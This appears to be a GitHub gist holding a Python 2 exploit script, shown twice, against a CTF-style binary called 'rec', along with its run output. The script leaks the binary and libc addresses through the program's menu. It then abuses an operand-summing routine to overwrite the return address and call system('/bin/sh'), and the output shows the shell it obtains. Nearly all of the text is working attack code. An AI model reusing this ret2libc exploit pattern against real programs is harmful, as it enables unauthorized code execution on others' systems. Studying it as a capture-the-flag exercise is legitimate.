inaz2/rec.py

## gistfile1.txt
$ python rec.py
[+] bin_base = 56580000
[+] libc_puts = f759f140
[+] libc_system = f757a940
[+] libc_binsh = f7698e8b
[+] got a shell!
id
uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare),999(docker)

## rec.py
from minipwn import *

def read_note(s):
    recvuntil(s, '> ')
    sendline(s, '1')
    recvuntil(s, 'Your note: ')
    note = recvline(s)
    return note

def polish_sum(s, operands):
    recvuntil(s, '> ')
    sendline(s, '2')
    recvuntil(s, 'Operator: ')
    sendline(s, 'S')
    for operand in operands:
        recvuntil(s, 'Operand: ')
        sendline(s, str(operand))
    recvuntil(s, 'Operand: ')
    sendline(s, '.')
    recvuntil(s, 'Sum: ')
    _sum = recvline(s)
    return int(_sum)

def sign(s, value):
    recvuntil(s, '> ')
    sendline(s, '5')
    sendline(s, str(value))

s = connect_process(['./rec_7743d76881fe811335ca25d8b0a3c5f54a21e2f1'])
#raw_input()

note = read_note(s)
bin_base = u32(note[4:8]) - 0x6fb
print "[+] bin_base = %x" % bin_base
plt_puts = bin_base + 0x520
got_puts = bin_base + 0x2fd8

values = range(0x63) + [plt_puts, got_puts]
polish_sum(s, values)
sign(s, 0)

"""
$ nm -D /lib32/libc.so.6 | grep -e puts$ -e system$
0005f140 W puts
0003a940 W system

$ strings -tx /lib32/libc.so.6 | grep /bin/sh
 158e8b /bin/sh
"""

data = recvline(s)
libc_puts = u32(data[:4])
print "[+] libc_puts = %x" % libc_puts
libc_system = libc_puts - 0x0005f140 + 0x0003a940
libc_binsh = libc_puts - 0x0005f140 + 0x158e8b
print "[+] libc_system = %x" % libc_system
print "[+] libc_binsh = %x" % libc_binsh

def u2s(x):
    """unsigned int to signed int"""
    s = struct.pack('<I', x)
    return struct.unpack('<i', s)[0]

values = range(0x63) + [u2s(libc_system), u2s(libc_binsh)]
polish_sum(s, values)
sign(s, 0)

print "[+] got a shell!"
interact(s)
	$ python rec.py
	[+] bin_base = 56580000
	[+] libc_puts = f759f140
	[+] libc_system = f757a940
	[+] libc_binsh = f7698e8b
	[+] got a shell!
	id
	uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare),999(docker)
	from minipwn import *

	def read_note(s):
	recvuntil(s, '> ')
	sendline(s, '1')
	recvuntil(s, 'Your note: ')
	note = recvline(s)
	return note

	def polish_sum(s, operands):
	recvuntil(s, '> ')
	sendline(s, '2')
	recvuntil(s, 'Operator: ')
	sendline(s, 'S')
	for operand in operands:
	recvuntil(s, 'Operand: ')
	sendline(s, str(operand))
	recvuntil(s, 'Operand: ')
	sendline(s, '.')
	recvuntil(s, 'Sum: ')
	_sum = recvline(s)
	return int(_sum)

	def sign(s, value):
	recvuntil(s, '> ')
	sendline(s, '5')
	sendline(s, str(value))

	s = connect_process(['./rec_7743d76881fe811335ca25d8b0a3c5f54a21e2f1'])
	#raw_input()

	note = read_note(s)
	bin_base = u32(note[4:8]) - 0x6fb
	print "[+] bin_base = %x" % bin_base
	plt_puts = bin_base + 0x520
	got_puts = bin_base + 0x2fd8

	values = range(0x63) + [plt_puts, got_puts]
	polish_sum(s, values)
	sign(s, 0)

	"""
	$ nm -D /lib32/libc.so.6 \| grep -e puts$ -e system$
	0005f140 W puts
	0003a940 W system

	$ strings -tx /lib32/libc.so.6 \| grep /bin/sh
	158e8b /bin/sh
	"""

	data = recvline(s)
	libc_puts = u32(data[:4])
	print "[+] libc_puts = %x" % libc_puts
	libc_system = libc_puts - 0x0005f140 + 0x0003a940
	libc_binsh = libc_puts - 0x0005f140 + 0x158e8b
	print "[+] libc_system = %x" % libc_system
	print "[+] libc_binsh = %x" % libc_binsh

	def u2s(x):
	"""unsigned int to signed int"""
	s = struct.pack('<I', x)
	return struct.unpack('<i', s)[0]

	values = range(0x63) + [u2s(libc_system), u2s(libc_binsh)]
	polish_sum(s, values)
	sign(s, 0)

	print "[+] got a shell!"
	interact(s)